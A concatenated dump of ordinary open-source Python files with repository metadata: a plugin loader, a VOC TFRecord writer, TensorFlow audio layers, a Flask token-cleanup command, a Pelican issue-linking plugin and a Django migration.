%r:\n%s" % (ep.name, traceback.format_exc()), err=True) def find_all_plugins_in_scope(self): """ Yields all plugins that should be used, based on what can be found in the python environment. """ for plugin in self.find_plugins_by_entry_points(): yield plugin # Load (runtime) def load_installed(self): """ Loads all plugins that have been installed. Takes the latest PluginRegistration found for each plugin and loads it. If the plugin isn't installed anymore, or has a different version, an error is raised. """ logger.info("Loading all installed plugins") from clims.models import PluginRegistration try: installed = list(PluginRegistration.objects.all()) except ProgrammingError: # We might be loading the application before migrations have run, so the # PluginRegistration type doesn't exist. In this case we silently pass and no plugins # will be loaded return latest = dict() for current in installed: if current.name in latest \ and latest[current.name].sortable_version > current.sortable_version: logger.debug("Found registration for {} but newer already found".format(current.name_and_version)) continue logger.debug("Found a registration for {}".format(current.name_and_version)) latest[current.name] = current for plugin_registration in latest.values(): self.load(plugin_registration) self.handlers.validate() logger.info("Active handlers after loading and validating all plugins:\n{}".format( self.handlers.to_handler_config())) def load(self, plugin_registration): """ Initializes the plugin class if it's found. It must match the name and version of the PluginRegistration. """ # NOTE: We currently require plugins to load (the True flag). This is because plugins # define types that must exist after they've been created. It might be worthy to find # a way to deal with plugins that should not load anymore. logger.info("Loading plugin '{}@{}'".format( plugin_registration.name, plugin_registration.version)) try: plugin = self.instance_manager.add( plugin_registration.name, plugin_registration.version, True) except self.instance_manager.ImportException: # NOTE: We need to find a smooth way of getting rid of the plugin but still have # an acceptably functioning system. For now however, this error is raised # Allow the user to ignore the plugin if an environment variable is set. This # is mainly for debug purposes and to be able to run `lims shell` in this situation. if not os.environ.get("CLIMS_IGNORE_UNAVAILABLE_PLUGINS", None) == "1": ex_type, ex_value, ex_tb = sys.exc_info() six.reraise(RequiredPluginCannotLoad, "Can't import required plugin {}@{}. The plugin has been installed e.g. via " "`lims upgrade` but the implementation is not found in the python environment. " "To override this check, you can set the " "environment variable CLIMS_IGNORE_UNAVAILABLE_PLUGINS=1\n\t{}".format( plugin_registration.name, plugin_registration.version, ex_value), ex_tb) except self.instance_manager.InitializeException: six.reraise(RequiredPluginCannotLoad, "Can't initialize the plugin {}@{}. The stacktrace has more information on " "why the plugin can not load.".format( plugin_registration.name, plugin_registration.version)) # Registers handlers. Handlers can be defined in the submodule `handlers` or `workflows` # directly below the plugin (TODO: Allow it to be defined anywhere) for module_name in ["handlers", "workflows"]: mod = self.get_plugin_module(plugin, module_name) if not mod: logger.info("No handlers module found in plugin '{}'".format(plugin)) else: logger.info("Loading all handlers in plugin '{}'".format(plugin.get_name_and_version())) self.handlers.load_handlers(mod) def init_plugin_instance(plugin): # TODO: Call this when the plugin is run on load time (review requirements first) from sentry.plugins import bindings plugin.setup(bindings) # Register contexts from plugins if necessary if hasattr(plugin, 'get_custom_contexts'): from sentry.interfaces.contexts import contexttype for cls in plugin.get_custom_contexts() or (): contexttype(cls) if (hasattr(plugin, 'get_cron_schedule') and plugin.is_enabled()): schedules = plugin.get_cron_schedule() if schedules: settings.CELERYBEAT_SCHEDULE.update(schedules) if (hasattr(plugin, 'get_worker_imports') and plugin.is_enabled()): imports = plugin.get_worker_imports() if imports: settings.CELERY_IMPORTS += tuple(imports) if (hasattr(plugin, 'get_worker_queues') and plugin.is_enabled()): from kombu import Queue for queue in plugin.get_worker_queues(): try: name, routing_key = queue except ValueError: name = routing_key = queue q = Queue(name, routing_key=routing_key) q.durable = False settings.CELERY_QUEUES.append(q) # Query def __iter__(self): return iter(self.all()) def __len__(self): return sum(1 for i in self.all()) def all(self, version=None, enabled=None): """ :param version: The version of the plugin interface. None will return all enabled plugins. :param enabled: Specifies if only enabled plugins should be returned (True). If None, both enabled and disbabled plugins are returned :return: A generator that iterates over the plugins """ for plugin in sorted(self.instance_manager.all(), key=lambda x: x.get_title()): if enabled is not None and not plugin.is_enabled(): continue if version is not None and plugin.__version__ != version: continue yield plugin def exists(self, slug): for plugin in self.all(version=None): if plugin.slug == slug: return True return False def get(self, slug): for plugin in self.all(version=None): if plugin.slug == slug: return plugin raise KeyError(slug) # Legacy # These methods are pending deletion (from the sentry core) def configurable_for_project(self, project, version=1): for plugin in self.all(version=version): if not safe_execute(plugin.can_configure_for_project, project, _with_transaction=False): continue yield plugin def for_project(self, project, version=1): for plugin in self.all(version=version): if not safe_execute(plugin.is_enabled, project, _with_transaction=False): continue yield plugin def for_site(self, version=1): for plugin in self.all(version=version): if not plugin.has_site_conf(): continue yield plugin def get_registered_base_handler(self, cls): """ Returns True if cls is an implementation of a registered handler type """ for handler_type in self.handlers: if issubclass(cls, handler_type): return handler_type return None def get_plugin_module(self, plugin_class, name): """ Gets a module defined in the plugin. Returns None if it wasn't found """ full_module_name = '{}.{}'.format(plugin_class.__module__, name) return self._import_module(full_module_name) def _import_module(self, full_module_name): split_name = full_module_name.split('.') name = split_name[-1] try: return importlib.import_module(full_module_name) except ImportError as ex: if six.text_type(ex) != "No module named {}".format(name): trace = sys.exc_info()[2] raise ImportError("Error while trying to load plugin {}".format(full_module_name)), None, trace logger.debug("Can't find module {}".format(full_module_name)) return None def clear_handler_implementations(self, baseclass=None): if baseclass is not None: self.handlers[baseclass].clear() else: for key in self.handlers: self.handlers[key].clear() def unregister(self, cls): self.remove('%s.%s' % (cls.__module__, cls.__name__)) return cls class PluginMustHaveVersion(Exception): pass class PluginIncorrectVersionFormat(Exception): pass class RequiredPluginCannotLoad(Exception): pass
39.245823
114
0.633666
1,985
16,444
5.093703
0.209068
0.015132
0.012462
0.008901
0.146375
0.090891
0.072495
0.05044
0.042528
0.032539
0
0.002479
0.288555
16,444
418
115
39.339713
0.861783
0.09505
0
0.173554
0
0
0.107164
0.006005
0
0
0
0.007177
0
0
null
null
0.012397
0.140496
null
null
0.004132
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd9a2a22106cfdf6f802047a7e11b687baf754c4
4,522
py
Python
datasets/pasval_voc_writer.py
jiabaocui/SEGS
c03d3bcb6fdcc4e6e6e13767bed8eae754beb726
[ "MIT" ]
null
null
null
datasets/pasval_voc_writer.py
jiabaocui/SEGS
c03d3bcb6fdcc4e6e6e13767bed8eae754beb726
[ "MIT" ]
null
null
null
datasets/pasval_voc_writer.py
jiabaocui/SEGS
c03d3bcb6fdcc4e6e6e13767bed8eae754beb726
[ "MIT" ]
null
null
null
import os import random import xml.etree.ElementTree as ET import tensorflow as tf def int64_feature(value): """Wrapper for inserting int64 features into Example proto. """ if not isinstance(value, list): value = [value] return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) def float_feature(value): """Wrapper for inserting float features into Example proto. """ if not isinstance(value, list): value = [value] return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def bytes_feature(value): """Wrapper for inserting bytes features into Example proto. """ if not isinstance(value, list): value = [value] return tf.train.Feature(bytes_list=tf.train.BytesList(value=value)) DEFUALT_PATHS = { 'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages', 'annotations': '/mnt/disk/chenyifeng/VOC2012/Annotations', 'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug' } class PascalVocWriter: """ PASCAL VOC 2012 DataSet to TF record Writer """ def __init__(self, paths=DEFUALT_PATHS): self.img_path = paths['images'] self.ano_path = paths['annotations'] self.sgm_path = paths['segmentations'] def convert_to_example(self, file_name): img_path = os.path.join(self.img_path, file_name + '.jpg') ano_path = os.path.join(self.ano_path, file_name + '.xml') sgm_path = os.path.join(self.sgm_path, file_name + '.png') img_data = tf.gfile.FastGFile(img_path, 'rb').read() sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read() # img_data = imread(img_path).tostring() # sgm_data = imread(sgm_path).tostring() anno_tree = ET.parse(ano_path) anno_root = anno_tree.getroot() # is_sgmt = int(anno_root.find('segmented').text) # if is_sgmt == 0: # print('{} is not a Segmentation Sample. So Skipped'.format(file_name)) size = anno_root.find('size') shape = [int(size.find('height').text), int(size.find('width').text), int(size.find('depth').text)] image_format = b'JPEG' segment_format = b'PNG' example = tf.train.Example( features=tf.train.Features( feature={ 'image/name':bytes_feature(file_name.encode()), 'image/height': int64_feature(shape[0]), 'image/width': int64_feature(shape[1]), 'image/channels': int64_feature(shape[2]), 'image/shape': int64_feature(shape), 'image/format': bytes_feature(image_format), 'image/encoded': bytes_feature(img_data), 'label/format': bytes_feature(segment_format), 'label/encoded': bytes_feature(sgm_data) } ) ) return example def add_to_record(self, file_name, tfrecord_writer): example = self.convert_to_example(file_name) tfrecord_writer.write(example.SerializeToString()) def run(self, pic_names, output_dir, shuffling=False, size=300): if shuffling: random.seed(1314) random.shuffle(pic_names) total_num = len(pic_names) for start in range(0, total_num, size): tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size) tf_recorder = tf.python_io.TFRecordWriter(tf_filename) print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100)) for pic_idx in range(start, min(start + 300, total_num)): pic_name = pic_names[pic_idx] self.add_to_record(pic_name, tf_recorder) print('=>' * 5 + '{:.0f}% Finished'.format(100)) def convert_val(): writer = PascalVocWriter() pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt').readlines() pic_names = [i.strip(' \n') for i in pic_names] writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val') def convert_train(): writer = PascalVocWriter() pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt').readlines() pic_names = [i.strip(' \n') for i in pic_names] writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train') if __name__ == '__main__': # convert_train() convert_val()
34.784615
103
0.623176
558
4,522
4.842294
0.268817
0.035529
0.044041
0.062176
0.280163
0.225759
0.225759
0.225759
0.225759
0.225759
0
0.021981
0.245467
4,522
129
104
35.054264
0.76993
0.102609
0
0.119048
0
0
0.158537
0.089597
0
0
0
0
0
1
0.107143
false
0
0.047619
0
0.214286
0.02381
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9b25df86c49c5c34262d4d2399058530c129b1
296
py
Python
backend/commands/remove_expired_tokens.py
KSodowska/codeforpoznan.pl_v3
ddb079db90eda869940f4467832ef96f70591055
[ "MIT" ]
8
2019-08-12T22:10:48.000Z
2020-09-13T17:46:10.000Z
backend/commands/remove_expired_tokens.py
KSodowska/codeforpoznan.pl_v3
ddb079db90eda869940f4467832ef96f70591055
[ "MIT" ]
326
2018-11-07T20:29:28.000Z
2022-02-10T08:53:42.000Z
backend/commands/remove_expired_tokens.py
KSodowska/codeforpoznan.pl_v3
ddb079db90eda869940f4467832ef96f70591055
[ "MIT" ]
49
2018-11-14T17:50:27.000Z
2021-04-20T22:40:29.000Z
import click from flask.cli import with_appcontext from backend.models import JWTToken @click.command() @with_appcontext def remove_expired_tokens(): """Remove expired tokens from database.""" click.echo("Removing expired tokens") JWTToken.remove_expired() click.echo("Done!")
21.142857
46
0.75
37
296
5.864865
0.513514
0.179724
0.175115
0
0
0
0
0
0
0
0
0
0.14527
296
13
47
22.769231
0.857708
0.121622
0
0
0
0
0.110236
0
0
0
0
0
0
1
0.111111
true
0
0.333333
0
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
2
bd9b69dd642e70dfb29c6adbdfeea6b8fd4c082f
200
py
Python
tests/cases/examples/skip_track/gen_playlist.py
aarongaut/nextsong
05639d3aba2ef31721fd2533ca804a0d32e64ebf
[ "MIT" ]
null
null
null
tests/cases/examples/skip_track/gen_playlist.py
aarongaut/nextsong
05639d3aba2ef31721fd2533ca804a0d32e64ebf
[ "MIT" ]
null
null
null
tests/cases/examples/skip_track/gen_playlist.py
aarongaut/nextsong
05639d3aba2ef31721fd2533ca804a0d32e64ebf
[ "MIT" ]
null
null
null
from nextsong import Playlist as p p( "01.mp3", p( p("02.mp3", weight=1 / 4), p(weight=3 / 4), count=1, ), "03.mp3", "04.mp3", loop=True, ).save_xml()
14.285714
34
0.455
30
200
3
0.666667
0.044444
0
0
0
0
0
0
0
0
0
0.131783
0.355
200
13
35
15.384615
0.565891
0
0
0.166667
0
0
0.12
0
0
0
0
0
0
1
0
true
0
0.083333
0
0.083333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
bd9ca71b402899675dbdc36257c37a8b3b2984d6
861
py
Python
pelican/plugins/issues/__init__.py
GlowstoneMC/glowstonemc.github.io
1d1a453251816ef90fb8aaa63a689c81aaad4848
[ "Artistic-2.0" ]
6
2016-07-30T00:44:10.000Z
2021-07-09T02:24:36.000Z
pelican/plugins/issues/__init__.py
GlowstoneMC/glowstonemc.github.io
1d1a453251816ef90fb8aaa63a689c81aaad4848
[ "Artistic-2.0" ]
16
2016-07-30T01:01:30.000Z
2021-07-09T21:33:51.000Z
pelican/plugins/issues/__init__.py
GlowstoneMC/glowstonemc.github.io
1d1a453251816ef90fb8aaa63a689c81aaad4848
[ "Artistic-2.0" ]
10
2015-01-21T19:57:43.000Z
2017-09-01T22:15:21.000Z
import itertools import re from pelican import signals ISSUE_REGEX = re.compile(r"([\s(])(#[\d]+)([\s),.])") ISSUE_URL = "https://github.com/GlowstoneMC/Glowstone/issues/{}" ISSUE_HTML = """{}<a href="{}">{}</a>{}""" def process_content(article): done_tags = set() for start, tag, end in ISSUE_REGEX.findall(article._content): if tag in done_tags: continue done_tags.add(tag) num = tag[1:] article._content = article._content.replace( "{}{}{}".format(start, tag, end), ISSUE_HTML.format(start, ISSUE_URL.format(num), tag, end), ) def get_issue_links(generator): blog = itertools.chain(generator.articles, generator.drafts) for article in blog: process_content(article) def register(): signals.article_generator_finalized.connect(get_issue_links)
24.6
70
0.637631
107
861
4.943925
0.485981
0.079395
0.079395
0
0
0
0
0
0
0
0
0.001464
0.206736
861
34
71
25.323529
0.77306
0
0
0
0
0
0.119628
0.027875
0
0
0
0
0
1
0.130435
false
0
0.130435
0
0.26087
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9d44c68b6bd8ea2a3e03df9da24659e42178bb
17,295
py
Python
athena/layers/commons.py
iou2much/athena
156dfceb0267e8c105e5d040aac017e2d8b9ad9d
[ "Apache-2.0" ]
null
null
null
athena/layers/commons.py
iou2much/athena
156dfceb0267e8c105e5d040aac017e2d8b9ad9d
[ "Apache-2.0" ]
null
null
null
athena/layers/commons.py
iou2much/athena
156dfceb0267e8c105e5d040aac017e2d8b9ad9d
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=too-few-public-methods, invalid-name # pylint: disable=no-self-use, missing-function-docstring """Utils for common layers.""" import tensorflow as tf from athena.layers.functional import make_positional_encoding, collapse4d, gelu from athena.layers.functional import splice from athena.utils.misc import gated_linear_layer class PositionalEncoding(tf.keras.layers.Layer): """positional encoding can be used in transformer""" def __init__(self, d_model, max_position=800, scale=False): super().__init__() self.d_model = d_model self.scale = scale self.pos_encoding = make_positional_encoding(max_position, d_model) def call(self, x): """ call function """ seq_len = tf.shape(x)[1] if self.scale: x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32)) x += self.pos_encoding[:, :seq_len, :] return x class ScaledPositionalEncoding(PositionalEncoding): """scaled positional encoding, reference: https://arxiv.org/pdf/1809.08895.pdf""" def __init__(self, d_model, max_position=800): super().__init__(d_model, max_position, scale=False) def build(self, _): self.alpha = self.add_weight( name="alpha", initializer=tf.keras.initializers.constant(1) ) def call(self, x): seq_len = tf.shape(x)[1] x += self.alpha * self.pos_encoding[:, :seq_len, :] return x class Collapse4D(tf.keras.layers.Layer): """collapse4d can be used in cnn-lstm for speech processing reshape from [N T D C] -> [N T D*C] """ def call(self, x): return collapse4d(x) class Gelu(tf.keras.layers.Layer): """Gaussian Error Linear Unit. This is a smoother version of the RELU. Original paper: https://arxiv.org/abs/1606.08415 Args: x: float Tensor to perform activation. Returns: x: with the GELU activation applied. """ def call(self, x): return gelu(x) class TdnnLayer(tf.keras.layers.Layer): """An implementation of Tdnn Layer Args: context: a int of left and right context, or a list of context indexes, e.g. (-2, 0, 2). output_dim: the dim of the linear transform """ def __init__(self, context, output_dim, use_bias=False, **kwargs): super().__init__(**kwargs) if hasattr(context, "__iter__"): self.context_size = len(context) self.context_list = context else: self.context_size = context * 2 + 1 self.context_list = range(-context, context + 1) self.output_dim = output_dim self.linear = tf.keras.layers.Dense(output_dim, use_bias=use_bias) def call(self, x, training=None, mask=None): x = splice(x, self.context_list) x = self.linear(x, training=training, mask=mask) return x class GroupNormalization(tf.keras.layers.Layer): def __init__( self, groups: int = 2, axis: int = -1, epsilon: float = 1e-3, center: bool = True, scale: bool = True, beta_initializer = "zeros", gamma_initializer = "ones", beta_regularizer = None, gamma_regularizer = None, beta_constraint = None, gamma_constraint = None, **kwargs ): super().__init__(**kwargs) self.supports_masking = True self.groups = groups self.axis = axis self.epsilon = epsilon self.center = center self.scale = scale self.beta_initializer = tf.keras.initializers.get(beta_initializer) self.gamma_initializer = tf.keras.initializers.get(gamma_initializer) self.beta_regularizer = tf.keras.regularizers.get(beta_regularizer) self.gamma_regularizer = tf.keras.regularizers.get(gamma_regularizer) self.beta_constraint = tf.keras.constraints.get(beta_constraint) self.gamma_constraint = tf.keras.constraints.get(gamma_constraint) self._check_axis() def build(self, input_shape): self._check_if_input_shape_is_none(input_shape) self._set_number_of_groups_for_instance_norm(input_shape) self._check_size_of_dimensions(input_shape) self._create_input_spec(input_shape) self._add_gamma_weight(input_shape) self._add_beta_weight(input_shape) self.built = True super().build(input_shape) def call(self, inputs): input_shape = tf.keras.backend.int_shape(inputs) tensor_input_shape = tf.shape(inputs) reshaped_inputs, group_shape = self._reshape_into_groups( inputs, input_shape, tensor_input_shape ) normalized_inputs = self._apply_normalization(reshaped_inputs, input_shape) outputs = tf.reshape(normalized_inputs, tensor_input_shape) return outputs def get_config(self): config = { "groups": self.groups, "axis": self.axis, "epsilon": self.epsilon, "center": self.center, "scale": self.scale, "beta_initializer": tf.keras.initializers.serialize(self.beta_initializer), "gamma_initializer": tf.keras.initializers.serialize( self.gamma_initializer ), "beta_regularizer": tf.keras.regularizers.serialize(self.beta_regularizer), "gamma_regularizer": tf.keras.regularizers.serialize( self.gamma_regularizer ), "beta_constraint": tf.keras.constraints.serialize(self.beta_constraint), "gamma_constraint": tf.keras.constraints.serialize(self.gamma_constraint), } base_config = super().get_config() return {**base_config, **config} def compute_output_shape(self, input_shape): return input_shape def _reshape_into_groups(self, inputs, input_shape, tensor_input_shape): group_shape = [tensor_input_shape[i] for i in range(len(input_shape))] group_shape[self.axis] = input_shape[self.axis] // self.groups group_shape.insert(self.axis, self.groups) group_shape = tf.stack(group_shape) reshaped_inputs = tf.reshape(inputs, group_shape) return reshaped_inputs, group_shape def _apply_normalization(self, reshaped_inputs, input_shape): group_shape = tf.keras.backend.int_shape(reshaped_inputs) group_reduction_axes = list(range(1, len(group_shape))) axis = -2 if self.axis == -1 else self.axis - 1 group_reduction_axes.pop(axis) mean, variance = tf.nn.moments( reshaped_inputs, group_reduction_axes, keepdims=True ) gamma, beta = self._get_reshaped_weights(input_shape) normalized_inputs = tf.nn.batch_normalization( reshaped_inputs, mean=mean, variance=variance, scale=gamma, offset=beta, variance_epsilon=self.epsilon, ) return normalized_inputs def _get_reshaped_weights(self, input_shape): broadcast_shape = self._create_broadcast_shape(input_shape) gamma = None beta = None if self.scale: gamma = tf.reshape(self.gamma, broadcast_shape) if self.center: beta = tf.reshape(self.beta, broadcast_shape) return gamma, beta def _check_if_input_shape_is_none(self, input_shape): dim = input_shape[self.axis] if dim is None: raise ValueError( "Axis " + str(self.axis) + " of " "input tensor should have a defined dimension " "but the layer received an input with shape " + str(input_shape) + "." ) def _set_number_of_groups_for_instance_norm(self, input_shape): dim = input_shape[self.axis] if self.groups == -1: self.groups = dim def _check_size_of_dimensions(self, input_shape): dim = input_shape[self.axis] if dim < self.groups: raise ValueError( "Number of groups (" + str(self.groups) + ") cannot be " "more than the number of channels (" + str(dim) + ")." ) if dim % self.groups != 0: raise ValueError( "Number of groups (" + str(self.groups) + ") must be a " "multiple of the number of channels (" + str(dim) + ")." ) def _check_axis(self): if self.axis == 0: raise ValueError( "You are trying to normalize your batch axis. Do you want to " "use tf.layer.batch_normalization instead" ) def _create_input_spec(self, input_shape): dim = input_shape[self.axis] self.input_spec = tf.keras.layers.InputSpec( ndim=len(input_shape), axes={self.axis: dim} ) def _add_gamma_weight(self, input_shape): dim = input_shape[self.axis] shape = (dim,) if self.scale: self.gamma = self.add_weight( shape=shape, name="gamma", initializer=self.gamma_initializer, regularizer=self.gamma_regularizer, constraint=self.gamma_constraint, ) else: self.gamma = None def _add_beta_weight(self, input_shape): dim = input_shape[self.axis] shape = (dim,) if self.center: self.beta = self.add_weight( shape=shape, name="beta", initializer=self.beta_initializer, regularizer=self.beta_regularizer, constraint=self.beta_constraint, ) else: self.beta = None def _create_broadcast_shape(self, input_shape): broadcast_shape = [1] * len(input_shape) broadcast_shape[self.axis] = input_shape[self.axis] // self.groups broadcast_shape.insert(self.axis, self.groups) return broadcast_shape class InstanceNormalization(GroupNormalization): """Instance normalization layer. References - [Instance Normalization: The Missing Ingredient for Fast Stylization] (https://arxiv.org/abs/1607.08022) """ def __init__(self, **kwargs): kwargs["groups"] = -1 super().__init__(**kwargs) class DownSampleBlock(tf.keras.layers.Layer): """conv2d downsample block for stargan, instance norm is used because batch size is 1 """ def __init__(self, filters, kernel_size, strides): super(DownSampleBlock, self).__init__() self.conv1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.conv2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) self.norm2 = InstanceNormalization(epsilon=1e-8) def call(self, x): h1 = self.conv1(x) h1_norm = self.norm1(h1) h1_gates = self.conv2(x) h1_gates_norm = self.norm2(h1_gates) h1_glu = gated_linear_layer(inputs=h1_norm, gates=h1_gates_norm) return h1_glu class UpSampleBlock(tf.keras.layers.Layer): """conv2d upsample block for stargan, instance norm is used because batch size is 1 """ def __init__(self, filters, kernel_size, strides): super(UpSampleBlock, self).__init__() self.conv1 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.conv2 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=strides, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) self.norm2 = InstanceNormalization(epsilon=1e-8) def call(self, x): h1 = self.conv1(x) h1_norm = self.norm1(h1) h1_gates = self.conv2(x) h1_gates_norm = self.norm2(h1_gates) h1_glu = gated_linear_layer(inputs=h1_norm, gates=h1_gates_norm) return h1_glu class ConditionalInstanceNormalisation(tf.keras.layers.Layer): """CIN Block.""" def __init__(self, in_channel): super(ConditionalInstanceNormalisation, self).__init__() self.dim_in = in_channel self.gamma = tf.keras.layers.Dense(in_channel) self.beta = tf.keras.layers.Dense(in_channel) def call(self, x, c): u = tf.math.reduce_mean(x, axis=1, keepdims=True) var = tf.math.reduce_mean((x - u) * (x - u), axis=1, keepdims=True) std = tf.math.sqrt(var + 1e-8) gamma = self.gamma(c) gamma = tf.reshape(gamma, [-1, 1, self.dim_in]) beta = self.beta(c) beta = tf.reshape(beta, [-1, 1, self.dim_in]) h = (x - u) / std h = h * gamma + beta return h class ResidualBlock(tf.keras.layers.Layer): """Residual Block with instance normalization.""" def __init__(self, out_channel): super(ResidualBlock, self).__init__() self.conv_1 = tf.keras.layers.Conv1D(filters=out_channel, kernel_size=3, strides=1, padding="same", use_bias=False) self.cin_1 = ConditionalInstanceNormalisation(out_channel) def call(self, x, c): x = self.conv_1(x) x = self.cin_1(x, c) x = gated_linear_layer(inputs=x, gates=x) return x class Down2d_init(tf.keras.layers.Layer): def __init__(self, filters , kernel_size, stride): super(Down2d_init, self).__init__() self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=stride, padding="same") def call(self, x): x1 = self.c1(x) x1 = gated_linear_layer(inputs=x1, gates=x1) return x1 class Down2d(tf.keras.layers.Layer): def __init__(self, filters , kernel_size, stride): super(Down2d, self).__init__() self.c1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=kernel_size, strides=stride, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) def call(self, x): x1 = self.c1(x) x1 = self.norm1(x1) x1 = gated_linear_layer(inputs=x1, gates=x1) return x1 class Up2d(tf.keras.layers.Layer): """docstring for Up2d.""" def __init__(self, filters, kernel_size, stride): super(Up2d, self).__init__() self.c1 = tf.keras.layers.Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=stride, padding="same") self.norm1 = InstanceNormalization(epsilon=1e-8) def call(self, x): x1 = self.c1(x) x1 = self.norm1(x1) x1 = gated_linear_layer(inputs=x1, gates=x1) return x1 class ZoneOutCell(tf.keras.layers.LSTMCell): """Wrapper for LSTM cell to create ZoneOut Cell inspired by: https://github.com/teganmaharaj/zoneout/blob/master/zoneout_tensorflow.py Published by one of 'https://arxiv.org/pdf/1606.01305.pdf' paper writers. """ def __init__(self, zoneout_rate=0., **kwargs): super().__init__(**kwargs) self.zoneout_rate = zoneout_rate self.drop_layer = tf.keras.layers.Dropout(self.zoneout_rate) def call(self, inputs, states, training=False): """Runs vanilla LSTM Cell and applies zoneout. """ # Apply vanilla LSTM outputs, new_states = super().call(inputs, states, training=training) if self.zoneout_rate == 0: return outputs, new_states # Apply zoneout h = (1 - self.zoneout_rate) * \ self.drop_layer(new_states[0] - states[0], training=training) + \ states[0] c = (1 - self.zoneout_rate) * \ self.drop_layer(new_states[1] - states[1], training=training) + \ states[1] return outputs, [h, c] def get_config(self): config = super().get_config() config['zoneout_rate'] = self.zoneout_rate return config SUPPORTED_RNNS = { "lstm": tf.keras.layers.LSTMCell, "gru": tf.keras.layers.GRUCell, "cudnnlstm": tf.keras.layers.LSTMCell, "cudnngru": tf.keras.layers.GRUCell } ACTIVATIONS = { "relu": tf.nn.relu, "relu6": tf.nn.relu6, "elu": tf.nn.elu, "selu": tf.nn.selu, "gelu": gelu, "leaky_relu": tf.nn.leaky_relu, "sigmoid": tf.nn.sigmoid, "softplus": tf.nn.softplus, "softsign": tf.nn.softsign, "tanh": tf.nn.tanh, }
34.179842
123
0.6244
2,131
17,295
4.855936
0.169404
0.030441
0.037688
0.020874
0.38017
0.310881
0.242076
0.22845
0.200812
0.179938
0
0.015778
0.263429
17,295
505
124
34.247525
0.79653
0.122637
0
0.256484
0
0
0.041311
0.001869
0
0
0
0
0
1
0.123919
false
0
0.011527
0.008646
0.242075
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9d5067373dbf69f5799fe7d45b1985b89fc18a
381
py
Python
tickets/migrations/0012_auto_20180830_1028.py
SpenserPorter/automate_reporting
59a0a9ff8776a7e14cd66575fc8ad7da7ec66087
[ "MIT" ]
1
2019-02-06T12:40:02.000Z
2019-02-06T12:40:02.000Z
tickets/migrations/0012_auto_20180830_1028.py
SpenserPorter/automate_reporting
59a0a9ff8776a7e14cd66575fc8ad7da7ec66087
[ "MIT" ]
null
null
null
tickets/migrations/0012_auto_20180830_1028.py
SpenserPorter/automate_reporting
59a0a9ff8776a7e14cd66575fc8ad7da7ec66087
[ "MIT" ]
null
null
null
# Generated by Django 2.1 on 2018-08-30 15:28 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('tickets', '0011_auto_20180830_0828'), ] operations = [ migrations.AlterField( model_name='ticket', name='dttm_updated', field=models.DateTimeField(), ), ]
20.052632
47
0.598425
39
381
5.717949
0.846154
0
0
0
0
0
0
0
0
0
0
0.111111
0.291339
381
18
48
21.166667
0.714815
0.112861
0
0
1
0
0.142857
0.068452
0
0
0
0
0
1
0
false
0
0.083333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd9d807e7a31d0445e4cb5f019e63d43a7bf4018
12,879
py
Python
oscar/data/mars.py
IntelLabs/OSCAR
25d1dea35727379117e11b7238b5a0d1ed19acad
[ "BSD-3-Clause" ]
13
2021-02-12T18:41:53.000Z
2022-01-14T07:17:15.000Z
oscar/data/mars.py
IntelLabs/OSCAR
25d1dea35727379117e11b7238b5a0d1ed19acad
[ "BSD-3-Clause" ]
null
null
null
oscar/data/mars.py
IntelLabs/OSCAR
25d1dea35727379117e11b7238b5a0d1ed19acad
[ "BSD-3-Clause" ]
2
2021-03-05T18:27:23.000Z
2021-03-05T23:16:09.000Z
